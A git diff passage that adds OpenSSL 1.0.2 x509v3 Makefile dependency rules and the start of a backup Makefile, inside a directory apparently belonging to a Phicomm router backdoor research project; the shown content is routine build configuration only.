+v3_akeya.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_akeya.o: ../cryptlib.h v3_akeya.c
+v3_alt.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_alt.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_alt.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_alt.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_alt.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_alt.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_alt.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_alt.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_alt.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_alt.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_alt.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_alt.o: ../cryptlib.h v3_alt.c
+v3_asid.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_asid.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_asid.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+v3_asid.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_asid.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_asid.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_asid.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_asid.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_asid.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_asid.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_asid.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_asid.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_asid.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_asid.c
+v3_bcons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_bcons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_bcons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_bcons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_bcons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_bcons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_bcons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_bcons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_bcons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_bcons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_bcons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_bcons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_bcons.o: ../cryptlib.h v3_bcons.c
+v3_bitst.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_bitst.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_bitst.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_bitst.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_bitst.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_bitst.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_bitst.o: ../../include/openssl/opensslconf.h
+v3_bitst.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_bitst.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_bitst.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_bitst.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_bitst.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_bitst.o: ../cryptlib.h v3_bitst.c
+v3_conf.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_conf.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_conf.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_conf.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_conf.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_conf.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_conf.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_conf.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_conf.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_conf.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_conf.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_conf.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_conf.c
+v3_cpols.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_cpols.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_cpols.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_cpols.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_cpols.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_cpols.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_cpols.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_cpols.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_cpols.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_cpols.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_cpols.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_cpols.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_cpols.o: ../cryptlib.h pcy_int.h v3_cpols.c
+v3_crld.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_crld.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_crld.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_crld.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_crld.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_crld.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_crld.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_crld.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_crld.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_crld.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_crld.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_crld.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_crld.o: ../cryptlib.h v3_crld.c
+v3_enum.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_enum.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_enum.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_enum.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_enum.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_enum.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_enum.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_enum.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_enum.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_enum.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_enum.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_enum.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_enum.c
+v3_extku.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_extku.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_extku.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_extku.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_extku.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_extku.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_extku.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_extku.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_extku.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_extku.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_extku.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_extku.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_extku.o: ../cryptlib.h v3_extku.c
+v3_genn.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_genn.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_genn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_genn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_genn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_genn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_genn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_genn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_genn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_genn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_genn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_genn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_genn.o: ../cryptlib.h v3_genn.c
+v3_ia5.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_ia5.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_ia5.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_ia5.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_ia5.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_ia5.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_ia5.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ia5.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ia5.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ia5.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ia5.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ia5.o: ../cryptlib.h v3_ia5.c
+v3_info.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_info.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_info.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_info.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_info.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_info.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_info.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_info.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_info.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_info.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_info.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_info.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_info.o: ../cryptlib.h v3_info.c
+v3_int.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_int.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_int.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_int.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_int.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_int.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_int.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_int.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_int.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_int.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_int.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_int.o: ../cryptlib.h v3_int.c
+v3_lib.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_lib.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_lib.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_lib.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_lib.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_lib.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_lib.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_lib.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_lib.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_lib.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_lib.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_lib.o: ../cryptlib.h ext_dat.h v3_lib.c
+v3_ncons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_ncons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_ncons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_ncons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_ncons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_ncons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_ncons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_ncons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ncons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ncons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ncons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ncons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ncons.o: ../cryptlib.h v3_ncons.c
+v3_ocsp.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_ocsp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_ocsp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_ocsp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_ocsp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_ocsp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_ocsp.o: ../../include/openssl/ocsp.h ../../include/openssl/opensslconf.h
+v3_ocsp.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_ocsp.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_ocsp.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_ocsp.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_ocsp.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_ocsp.o: ../cryptlib.h v3_ocsp.c
+v3_pci.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_pci.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pci.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pci.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pci.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pci.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pci.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pci.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pci.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pci.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pci.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pci.o: ../cryptlib.h v3_pci.c
+v3_pcia.o: ../../include/openssl/asn1.h ../../include/openssl/asn1t.h
+v3_pcia.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_pcia.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_pcia.o: ../../include/openssl/e_os2.h ../../include/openssl/evp.h
+v3_pcia.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pcia.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pcia.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pcia.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pcia.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pcia.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pcia.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pcia.o: v3_pcia.c
+v3_pcons.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pcons.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pcons.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pcons.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pcons.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pcons.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pcons.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pcons.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pcons.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pcons.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pcons.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pcons.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pcons.o: ../cryptlib.h v3_pcons.c
+v3_pku.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pku.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pku.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pku.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pku.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pku.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pku.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pku.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pku.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pku.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pku.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pku.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pku.o: ../cryptlib.h v3_pku.c
+v3_pmaps.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_pmaps.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_pmaps.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_pmaps.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_pmaps.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_pmaps.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_pmaps.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_pmaps.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_pmaps.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_pmaps.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_pmaps.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_pmaps.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_pmaps.o: ../cryptlib.h v3_pmaps.c
+v3_prn.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_prn.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_prn.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_prn.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_prn.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_prn.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_prn.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_prn.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_prn.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_prn.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_prn.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_prn.o: ../cryptlib.h v3_prn.c
+v3_purp.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_purp.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_purp.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_purp.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_purp.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_purp.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_purp.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_purp.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_purp.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_purp.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_purp.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_purp.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_purp.c
+v3_scts.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_scts.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_scts.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_scts.o: ../../include/openssl/dsa.h ../../include/openssl/dtls1.h
+v3_scts.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_scts.o: ../../include/openssl/evp.h ../../include/openssl/hmac.h
+v3_scts.o: ../../include/openssl/kssl.h ../../include/openssl/lhash.h
+v3_scts.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_scts.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_scts.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pem.h
+v3_scts.o: ../../include/openssl/pem2.h ../../include/openssl/pkcs7.h
+v3_scts.o: ../../include/openssl/pqueue.h ../../include/openssl/rsa.h
+v3_scts.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_scts.o: ../../include/openssl/srtp.h ../../include/openssl/ssl.h
+v3_scts.o: ../../include/openssl/ssl2.h ../../include/openssl/ssl23.h
+v3_scts.o: ../../include/openssl/ssl3.h ../../include/openssl/stack.h
+v3_scts.o: ../../include/openssl/symhacks.h ../../include/openssl/tls1.h
+v3_scts.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_scts.o: ../../include/openssl/x509v3.h ../../ssl/ssl_locl.h ../cryptlib.h
+v3_scts.o: v3_scts.c
+v3_skey.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_skey.o: ../../include/openssl/bio.h ../../include/openssl/buffer.h
+v3_skey.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_skey.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_skey.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_skey.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_skey.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_skey.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_skey.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_skey.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_skey.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_skey.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_skey.c
+v3_sxnet.o: ../../e_os.h ../../include/openssl/asn1.h
+v3_sxnet.o: ../../include/openssl/asn1t.h ../../include/openssl/bio.h
+v3_sxnet.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3_sxnet.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3_sxnet.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3_sxnet.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3_sxnet.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3_sxnet.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3_sxnet.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3_sxnet.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3_sxnet.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3_sxnet.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3_sxnet.o: ../cryptlib.h v3_sxnet.c
+v3_utl.o: ../../e_os.h ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3_utl.o: ../../include/openssl/bn.h ../../include/openssl/buffer.h
+v3_utl.o: ../../include/openssl/conf.h ../../include/openssl/crypto.h
+v3_utl.o: ../../include/openssl/e_os2.h ../../include/openssl/err.h
+v3_utl.o: ../../include/openssl/evp.h ../../include/openssl/lhash.h
+v3_utl.o: ../../include/openssl/obj_mac.h ../../include/openssl/objects.h
+v3_utl.o: ../../include/openssl/opensslconf.h ../../include/openssl/opensslv.h
+v3_utl.o: ../../include/openssl/ossl_typ.h ../../include/openssl/pkcs7.h
+v3_utl.o: ../../include/openssl/safestack.h ../../include/openssl/sha.h
+v3_utl.o: ../../include/openssl/stack.h ../../include/openssl/symhacks.h
+v3_utl.o: ../../include/openssl/x509.h ../../include/openssl/x509_vfy.h
+v3_utl.o: ../../include/openssl/x509v3.h ../cryptlib.h v3_utl.c
+v3err.o: ../../include/openssl/asn1.h ../../include/openssl/bio.h
+v3err.o: ../../include/openssl/buffer.h ../../include/openssl/conf.h
+v3err.o: ../../include/openssl/crypto.h ../../include/openssl/e_os2.h
+v3err.o: ../../include/openssl/err.h ../../include/openssl/evp.h
+v3err.o: ../../include/openssl/lhash.h ../../include/openssl/obj_mac.h
+v3err.o: ../../include/openssl/objects.h ../../include/openssl/opensslconf.h
+v3err.o: ../../include/openssl/opensslv.h ../../include/openssl/ossl_typ.h
+v3err.o: ../../include/openssl/pkcs7.h ../../include/openssl/safestack.h
+v3err.o: ../../include/openssl/sha.h ../../include/openssl/stack.h
+v3err.o: ../../include/openssl/symhacks.h ../../include/openssl/x509.h
+v3err.o: ../../include/openssl/x509_vfy.h ../../include/openssl/x509v3.h
+v3err.o: v3err.c
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile.bak b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile.bak
new file mode 100644
index 0000000..6c3ecaf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/x509v3/Makefile.bak
@@ -0,0 +1,558 @@
+#
+# OpenSSL/crypto/x509v3/Makefile
+#
+
+DIR=	x509v3
+TOP=	../..
+CC=	cc
+INCLUDES= -I.. -I$(TOP) -I../../include
+CFLAG=-g
+MAKEFILE=	Makefile
+AR=		ar r
+
+CFLAGS= $(INCLUDES) $(CFLAG)
+
+GENERAL=Makefile README
+TEST=v3nametest.c
+APPS=
+
+LIB=$(TOP)/libcrypto.a
+LIBSRC=	v3_bcons.c v3_bitst.c v3_conf.c v3_extku.c v3_ia5.c v3_lib.c \
+v3_prn.c v3_utl.c v3err.c v3_genn.c v3_alt.c v3_skey.c v3_akey.c v3_pku.c \
+v3_int.c v3_enum.c v3_sxnet.c v3_cpols.c v3_crld.c v3_purp.c v3_info.c \
+v3_ocsp.c v3_akeya.c v3_pmaps.c v3_pcons.c v3_ncons.c v3_pcia.c v3_pci.c \
+pcy_cache.c pcy_node.c pcy_data.c pcy_map.c pcy_tree.c pcy_lib.c \
+v3_asid.c v3_addr.c v3_scts.c
+LIBOBJ= v3_bcons.o v3_bitst.o v3_conf.o v3_extku.o v3_ia5.o v3_lib.o \
+v3_prn.o v3_utl.o v3err.o v3_genn.o v3_alt.o v3_skey.o v3_akey.o v3_pku.o \
+v3_int.o v3_enum.o v3_sxnet.o v3_cpols.o v3_crld.o v3_purp.o v3_info.o \
+v3_ocsp.o v3_akeya.o v3_pmaps.o v3_pcons.o v3_ncons.o v3_pcia.o v3_pci.o \
+pcy_cache.o pcy_node.o pcy_data.o pcy_map.o pcy_tree.o pcy_lib.o \
+v3_asid.o v3_addr.o v3_scts.o
+
+SRC= $(LIBSRC)
+
+EXHEADER= x509v3.h
+HEADER=	$(EXHEADER) pcy_int.h
+
+ALL=    $(GENERAL) $(SRC) $(HEADER)
+
+top:
+	(cd ../..; $(MAKE) DIRS=crypto SDIRS=$(DIR) sub_all)
+
+all:	lib
+
+lib:	$(LIBOBJ)
+	$(AR) $(LIB) $(LIBOBJ)
+	$(RANLIB) $(LIB) || echo Never mind.
+	@touch lib
+
+files:
+	$(PERL) $(TOP)/util/files.pl Makefile >> $(TOP)/MINFO
+
+links:
